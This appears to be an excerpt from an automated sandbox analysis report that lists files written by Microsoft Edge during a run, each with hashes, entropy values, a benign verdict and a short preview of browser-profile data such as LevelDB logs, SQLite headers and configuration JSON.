                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                    Entropy (8bit):5.3540917742157585
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:uA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:uFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                    MD5:0AE6941F2D9EF6D0A4A4FB2D96BBBC25
                                                                                                                                                                                    SHA1:38C1F35E9B03DBD9BBB8D48D54E769BBB75FED6C
                                                                                                                                                                                    SHA-256:A739BA848E0C074DF46DC7758177A608F655C55ED1960123BF431252A6E21D2B
                                                                                                                                                                                    SHA-512:7B07EA39B1B99A45742A47291202BED44D8BFAD8C14285A861F665140A6122C691D412AF502733FCF5AFDDB4303CA8E687A1EFB14CD566F0F7BC7297636BD618
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...m.................DB_VERSION.1i.<Iq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380906606482458..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):309
                                                                                                                                                                                    Entropy (8bit):5.152855061911853
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOr17V81wkn23oH+Tcwtk2WwnvB2KLl5PtlWM+q2Pwkn23oH+Tcwtk2WwnvIFUv:7DfYebkxwnvFLX7L+vYfYebkxwnQFUv
                                                                                                                                                                                    MD5:9D209C8ACEE7DB51BDA25E1F894EEB93
                                                                                                                                                                                    SHA1:FD2816673060EC2D7F4412DB585C189390590A6A
                                                                                                                                                                                    SHA-256:7276126E3AF0630568A0164E9E2495C892E64D604D6A9D0C5D245AFDA3D48A35
                                                                                                                                                                                    SHA-512:7F91FCC461A07BBBBD0DF47CDA9C1B98A6BA79DDD162297B4830A60F7764BA05D9C8E4DACDCB68C78D1F862B58767537CD7C5BCE974104736E2B0F1889BE69E1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:05.465 1d1c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-09:30:05.529 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):358859
                                                                                                                                                                                    Entropy (8bit):5.324601394148671
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R1:C1gAg1zfvN
                                                                                                                                                                                    MD5:391D007071495E4D969208B215866899
                                                                                                                                                                                    SHA1:07210238DF2AB9872491CAA27180E8992ED722A6
                                                                                                                                                                                    SHA-256:6F740399D82E7E5B230621D1134566155FC04504388A9F581FADAFEB5F37E168
                                                                                                                                                                                    SHA-512:525A75B132D55FE3278A807C394EC4AFBD8891C2BF7D21FFD7D6F3EAA9795A16AFADDA30FCF40F5B4AA89EDFA7E1D6CD236137EE35E67873A0AA2FC904415211
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):209
                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                    MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                    SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                    SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                    SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):281
                                                                                                                                                                                    Entropy (8bit):5.1646139698999685
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrZQ17q1wkn23oH+Tcwt8aVdg2KLl5dUHQ+q2Pwkn23oH+Tcwt8aPrqIFUv:7YhfYeb0LYVvYfYebL3FUv
                                                                                                                                                                                    MD5:5CC6962E2343BB968F1DB54B1386E5B2
                                                                                                                                                                                    SHA1:30B52D0FB74FE7C000F94916EF7536ABB60A594B
                                                                                                                                                                                    SHA-256:4FA8B26EEE9A1A6E2FE4BFB0E07B6013FB346619EA91FEC2BB283982BBBA7799
                                                                                                                                                                                    SHA-512:BDED3D41AFAE3AF6319E594DD18B0C14931D69A850311B494D937994DEFA568349E84CEC66609CFC2CB92D91C192E89D0AB817A1168EF8B2FB8F3888F4CFCF19
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.359 1b38 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/01/09-09:30:01.711 1b38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):209
                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                    MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                    SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                    SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                    SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):285
                                                                                                                                                                                    Entropy (8bit):5.176261871825148
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrdUcq1wkn23oH+Tcwt86FB2KLl5duQ+q2Pwkn23oH+Tcwt865IFUv:7NfYeb/FFLUVvYfYeb/WFUv
                                                                                                                                                                                    MD5:DB53A63E8E25006D89BFF4F2D54AF3D6
                                                                                                                                                                                    SHA1:249EA246F9BE261547D9E58C1F8828AA884F7F9F
                                                                                                                                                                                    SHA-256:44161E38A5FB9531BCA96700017EC77566195633B684D034B5B33CA82F2CED41
                                                                                                                                                                                    SHA-512:549B4F9B4A58ECB5CE4160A6D0DEB175552703A3B7849102A10CEFA2817BD98480B54C42A2DEAE43821A2E939F953F5A010D6B52397250A6C50F18F4505DFCD5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.714 1b38 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/01/09-09:30:01.728 1b38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1197
                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                    MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                    SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                    SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                    SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):322
                                                                                                                                                                                    Entropy (8bit):5.088381991872956
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrEMVOq2Pwkn23oH+Tcwt8NIFUtJEMFcZmwPEm6zkwOwkn23oH+Tcwt8+eLJ:71OvYfYebpFUtLu/6z5JfYebqJ
                                                                                                                                                                                    MD5:BC6843F07A536006EC22E97BC788780C
                                                                                                                                                                                    SHA1:1EE0478F9B2E3A1CF880851DA6F6AB9B6BD17951
                                                                                                                                                                                    SHA-256:CD51B6900482AF472BE172410FB3ED316A59F26808CC06C4F1D064B4A64B7FF5
                                                                                                                                                                                    SHA-512:71C2869F3CCF35B6E0824BC02E3C94356920D630B1F256061C5B2D6E155B9F853F7B58F174CB17C166179163D7FFDE4AA71CAC3685F46C4C350BCB065036A555
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.171 19e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-09:30:02.172 19e0 Recovering log #3.2025/01/09-09:30:02.174 19e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):322
                                                                                                                                                                                    Entropy (8bit):5.088381991872956
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrEMVOq2Pwkn23oH+Tcwt8NIFUtJEMFcZmwPEm6zkwOwkn23oH+Tcwt8+eLJ:71OvYfYebpFUtLu/6z5JfYebqJ
                                                                                                                                                                                    MD5:BC6843F07A536006EC22E97BC788780C
                                                                                                                                                                                    SHA1:1EE0478F9B2E3A1CF880851DA6F6AB9B6BD17951
                                                                                                                                                                                    SHA-256:CD51B6900482AF472BE172410FB3ED316A59F26808CC06C4F1D064B4A64B7FF5
                                                                                                                                                                                    SHA-512:71C2869F3CCF35B6E0824BC02E3C94356920D630B1F256061C5B2D6E155B9F853F7B58F174CB17C166179163D7FFDE4AA71CAC3685F46C4C350BCB065036A555
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.171 19e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-09:30:02.172 19e0 Recovering log #3.2025/01/09-09:30:02.174 19e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                                    Entropy (8bit):0.3169096321222068
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                    MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                    SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                    SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                    SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                    Entropy (8bit):0.40981274649195937
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                    MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                    SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                    SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                    SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
